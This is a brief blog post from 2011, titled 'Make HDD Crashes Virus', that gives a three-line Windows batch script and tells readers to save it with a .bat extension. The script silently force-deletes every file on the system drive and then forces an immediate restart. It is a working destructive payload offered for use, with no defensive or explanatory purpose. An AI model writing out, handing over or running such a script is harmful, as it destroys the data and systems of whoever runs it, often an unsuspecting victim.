Pages

Thursday, 29 September 2011

Make HDD Crashes Virus

Open Notepad and Enter the following code
 
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save the above code with  .bat extension.

No comments:

Post a Comment